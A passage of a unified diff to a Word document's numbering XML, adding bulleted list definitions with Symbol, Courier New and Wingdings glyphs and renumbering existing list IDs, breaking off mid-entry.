+    <w:lvl w:ilvl="3" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="2880"/>
+        </w:tabs>
+        <w:ind w:left="2880" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+        <w:sz w:val="20"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="4" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="3600"/>
+        </w:tabs>
+        <w:ind w:left="3600" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+        <w:sz w:val="20"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="5" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="4320"/>
+        </w:tabs>
+        <w:ind w:left="4320" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+        <w:sz w:val="20"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="6" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="5040"/>
+        </w:tabs>
+        <w:ind w:left="5040" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+        <w:sz w:val="20"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="7" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="5760"/>
+        </w:tabs>
+        <w:ind w:left="5760" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+        <w:sz w:val="20"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="8" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="6480"/>
+        </w:tabs>
+        <w:ind w:left="6480" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+        <w:sz w:val="20"/>
+      </w:rPr>
+    </w:lvl>
+  </w:abstractNum>
+  <w:abstractNum w:abstractNumId="3" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="11E371A2"/>
     <w:multiLevelType w:val="multilevel"/>
     <w:tmpl w:val="36B06A30"/>
@@ -6144,7 +9159,156 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="3" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="4" w15:restartNumberingAfterBreak="0">
+    <w:nsid w:val="18D14795"/>
+    <w:multiLevelType w:val="multilevel"/>
+    <w:tmpl w:val="B0008084"/>
+    <w:lvl w:ilvl="0">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="720"/>
+        </w:tabs>
+        <w:ind w:left="720" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
+        <w:sz w:val="20"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="1" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="o"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="1440"/>
+        </w:tabs>
+        <w:ind w:left="1440" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:hint="default"/>
+        <w:sz w:val="20"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="2" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="2160"/>
+        </w:tabs>
+        <w:ind w:left="2160" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+        <w:sz w:val="20"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="3" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="2880"/>
+        </w:tabs>
+        <w:ind w:left="2880" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+        <w:sz w:val="20"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="4" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="3600"/>
+        </w:tabs>
+        <w:ind w:left="3600" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+        <w:sz w:val="20"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="5" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="4320"/>
+        </w:tabs>
+        <w:ind w:left="4320" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+        <w:sz w:val="20"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="6" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="5040"/>
+        </w:tabs>
+        <w:ind w:left="5040" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+        <w:sz w:val="20"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="7" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="5760"/>
+        </w:tabs>
+        <w:ind w:left="5760" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+        <w:sz w:val="20"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="8" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="6480"/>
+        </w:tabs>
+        <w:ind w:left="6480" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+        <w:sz w:val="20"/>
+      </w:rPr>
+    </w:lvl>
+  </w:abstractNum>
+  <w:abstractNum w:abstractNumId="5" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="1C7C6521"/>
     <w:multiLevelType w:val="multilevel"/>
     <w:tmpl w:val="E98AE164"/>
@@ -6293,7 +9457,7 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="4" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="6" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="267D50FC"/>
     <w:multiLevelType w:val="multilevel"/>
     <w:tmpl w:val="41DC1DC6"/>
@@ -6442,7 +9606,7 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="5" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="7" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="2C0320E7"/>
     <w:multiLevelType w:val="multilevel"/>
     <w:tmpl w:val="F99ED534"/>
@@ -6591,7 +9755,7 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="6" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="8" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="34EA3CCC"/>
     <w:multiLevelType w:val="multilevel"/>
     <w:tmpl w:val="5D6EC814"/>
@@ -6740,7 +9904,7 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="7" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="9" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="35E13925"/>
     <w:multiLevelType w:val="multilevel"/>
     <w:tmpl w:val="F3324CFA"/>
@@ -6889,7 +10053,7 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="8" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="10" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="37957ADA"/>
     <w:multiLevelType w:val="multilevel"/>
     <w:tmpl w:val="9B30F31C"/>
@@ -7038,7 +10202,7 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="9" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="11" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="38030846"/>
     <w:multiLevelType w:val="multilevel"/>
     <w:tmpl w:val="316A1AF8"/>
@@ -7187,7 +10351,156 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="10" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="12" w15:restartNumberingAfterBreak="0">
+    <w:nsid w:val="3E405018"/>
+    <w:multiLevelType w:val="multilevel"/>
+    <w:tmpl w:val="D308534C"/>
+    <w:lvl w:ilvl="0">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="720"/>
+        </w:tabs>
+        <w:ind w:left="720" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
+        <w:sz w:val="20"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="1" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="o"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="1440"/>
+        </w:tabs>
+        <w:ind w:left="1440" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:hint="default"/>
+        <w:sz w:val="20"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="2" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="2160"/>
+        </w:tabs>
+        <w:ind w:left="2160" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+        <w:sz w:val="20"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="3" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="2880"/>
+        </w:tabs>
+        <w:ind w:left="2880" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+        <w:sz w:val="20"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="4" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="3600"/>
+        </w:tabs>
+        <w:ind w:left="3600" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+        <w:sz w:val="20"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="5" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="4320"/>
+        </w:tabs>
+        <w:ind w:left="4320" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+        <w:sz w:val="20"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="6" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="5040"/>
+        </w:tabs>
+        <w:ind w:left="5040" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+        <w:sz w:val="20"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="7" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="5760"/>
+        </w:tabs>
+        <w:ind w:left="5760" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+        <w:sz w:val="20"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="8" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="6480"/>
+        </w:tabs>
+        <w:ind w:left="6480" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+        <w:sz w:val="20"/>
+      </w:rPr>
+    </w:lvl>
+  </w:abstractNum>
+  <w:abstractNum w:abstractNumId="13" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="3E561A1C"/>
     <w:multiLevelType w:val="multilevel"/>
     <w:tmpl w:val="C5421192"/>
@@ -7332,7 +10645,7 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="11" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="14" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="3EF73FFC"/>
     <w:multiLevelType w:val="multilevel"/>
     <w:tmpl w:val="B1440024"/>
@@ -7445,7 +10758,454 @@
       </w:pPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="12" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="15" w15:restartNumberingAfterBreak="0">
+    <w:nsid w:val="444E1491"/>
+    <w:multiLevelType w:val="multilevel"/>
+    <w:tmpl w:val="63BEE3DE"/>
+    <w:lvl w:ilvl="0">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="720"/>
+        </w:tabs>
+        <w:ind w:left="720" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
+        <w:sz w:val="20"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="1" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="o"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="1440"/>
+        </w:tabs>
+        <w:ind w:left="1440" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:hint="default"/>
+        <w:sz w:val="20"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="2" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="2160"/>
+        </w:tabs>
+        <w:ind w:left="2160" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+        <w:sz w:val="20"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="3" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="2880"/>
+        </w:tabs>
+        <w:ind w:left="2880" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+        <w:sz w:val="20"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="4" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="3600"/>
+        </w:tabs>
+        <w:ind w:left="3600" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+        <w:sz w:val="20"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="5" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="4320"/>
+        </w:tabs>
+        <w:ind w:left="4320" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+        <w:sz w:val="20"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="6" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="5040"/>
+        </w:tabs>
+        <w:ind w:left="5040" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+        <w:sz w:val="20"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="7" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="5760"/>
+        </w:tabs>
+        <w:ind w:left="5760" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+        <w:sz w:val="20"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="8" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="6480"/>
+        </w:tabs>
+        <w:ind w:left="6480" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+        <w:sz w:val="20"/>
+      </w:rPr>
+    </w:lvl>
+  </w:abstractNum>
+  <w:abstractNum w:abstractNumId="16" w15:restartNumberingAfterBreak="0">
+    <w:nsid w:val="44EA1797"/>
+    <w:multiLevelType w:val="multilevel"/>
+    <w:tmpl w:val="706A1E28"/>
+    <w:lvl w:ilvl="0">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="720"/>
+        </w:tabs>
+        <w:ind w:left="720" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
+        <w:sz w:val="20"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="1" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="o"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="1440"/>
+        </w:tabs>
+        <w:ind w:left="1440" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:hint="default"/>
+        <w:sz w:val="20"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="2" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="2160"/>
+        </w:tabs>
+        <w:ind w:left="2160" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+        <w:sz w:val="20"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="3" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="2880"/>
+        </w:tabs>
+        <w:ind w:left="2880" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+        <w:sz w:val="20"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="4" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="3600"/>
+        </w:tabs>
+        <w:ind w:left="3600" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+        <w:sz w:val="20"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="5" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="4320"/>
+        </w:tabs>
+        <w:ind w:left="4320" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+        <w:sz w:val="20"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="6" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="5040"/>
+        </w:tabs>
+        <w:ind w:left="5040" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+        <w:sz w:val="20"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="7" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="5760"/>
+        </w:tabs>
+        <w:ind w:left="5760" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+        <w:sz w:val="20"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="8" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="6480"/>
+        </w:tabs>
+        <w:ind w:left="6480" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+        <w:sz w:val="20"/>
+      </w:rPr>
+    </w:lvl>
+  </w:abstractNum>
+  <w:abstractNum w:abstractNumId="17" w15:restartNumberingAfterBreak="0">
+    <w:nsid w:val="4C2E34CF"/>
+    <w:multiLevelType w:val="multilevel"/>
+    <w:tmpl w:val="59CA364C"/>
+    <w:lvl w:ilvl="0">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="720"/>
+        </w:tabs>
+        <w:ind w:left="720" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
+        <w:sz w:val="20"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="1" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="o"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="1440"/>
+        </w:tabs>
+        <w:ind w:left="1440" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:hint="default"/>
+        <w:sz w:val="20"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="2" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="2160"/>
+        </w:tabs>
+        <w:ind w:left="2160" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+        <w:sz w:val="20"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="3" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
